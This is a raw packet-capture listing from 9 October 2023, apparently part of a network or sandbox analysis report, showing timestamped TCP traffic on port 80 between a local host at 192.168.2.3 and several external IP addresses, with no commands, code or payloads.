                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.093580961 CEST804977081.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.093667030 CEST4977080192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248739004 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248789072 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248827934 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248823881 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248866081 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248881102 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248881102 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248905897 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248910904 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.248950005 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.265490055 CEST8049772213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.265605927 CEST4977280192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281246901 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281378984 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281440020 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281443119 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281444073 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281477928 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281491041 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281528950 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281537056 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281578064 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281579971 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281622887 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281625032 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281663895 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281666994 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.281717062 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.295687914 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.297651052 CEST8049761210.140.73.39192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.297713041 CEST4976180192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322397947 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322454929 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322489977 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322532892 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322532892 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322567940 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322571039 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322607994 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322622061 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322658062 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322676897 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322702885 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322710991 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322738886 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322746038 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322781086 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322787046 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322823048 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322828054 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322864056 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322869062 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322901964 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322904110 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322937012 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322949886 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322983980 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.322984934 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323018074 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323019028 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323054075 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323064089 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323100090 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323103905 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323138952 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323149920 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323184967 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323185921 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323213100 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323220015 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323247910 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323256969 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323285103 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323292017 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323321104 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323345900 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323374987 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323380947 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323401928 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323405027 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323430061 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323434114 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323465109 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323637009 CEST4977280192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323642969 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323679924 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323688984 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323725939 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323728085 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323755980 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323765993 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.323792934 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.324170113 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.324197054 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.324207067 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.324229002 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.335791111 CEST4977480192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348300934 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348350048 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348365068 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348387957 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348396063 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348432064 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348460913 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348499060 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348501921 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348535061 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348539114 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348572016 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348576069 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348609924 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348658085 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348699093 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348711967 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348747015 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348748922 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348783970 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348786116 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348820925 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348822117 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348859072 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348954916 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.348994017 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349035978 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349072933 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349090099 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349127054 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349128962 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349173069 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349181890 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349217892 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349219084 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349255085 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349323034 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349360943 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349360943 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349415064 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349451065 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349498987 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349553108 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349591970 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349598885 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349634886 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349636078 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349670887 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349673033 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349708080 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349710941 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349745989 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349905968 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349944115 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349956989 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349992990 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.349997044 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350030899 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350048065 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350087881 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350101948 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350142002 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350157976 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350194931 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350195885 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350231886 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350234032 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350270987 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350503922 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350548029 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350557089 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350594044 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350765944 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350805044 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350810051 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350847960 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350878000 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350914001 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350941896 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350951910 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.350966930 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351005077 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351027012 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351062059 CEST8049773162.43.120.128192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351063967 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351099968 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351139069 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351167917 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351205111 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351212025 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351248980 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351264000 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351300001 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351300955 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351336956 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351337910 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.351372957 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.352061987 CEST8049773162.43.120.128192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.352112055 CEST4977380192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.370565891 CEST4977380192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.403136969 CEST4977180192.168.2.3198.100.146.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.498517990 CEST8049774172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.498609066 CEST4977480192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.501173019 CEST4977480192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.542079926 CEST4977580192.168.2.3107.180.98.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.563167095 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.563251019 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.563338041 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.563376904 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.563432932 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.563477039 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.563549042 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.563756943 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.620306015 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639311075 CEST8049772213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639341116 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639410973 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639415026 CEST4977280192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639448881 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639461994 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639472961 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639486074 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639538050 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639548063 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639554024 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639658928 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639658928 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639658928 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639715910 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639741898 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639755964 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639774084 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639776945 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639812946 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639833927 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639867067 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639885902 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639919996 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639939070 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639950037 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639965057 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639971972 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639976025 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.639986038 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640007973 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640033007 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640043020 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640064955 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640068054 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640085936 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640100002 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640285969 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640324116 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640324116 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640340090 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640360117 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640377045 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640377998 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640391111 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640405893 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640408993 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640425920 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640441895 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.640465975 CEST8049767217.79.184.35192.168.2.3
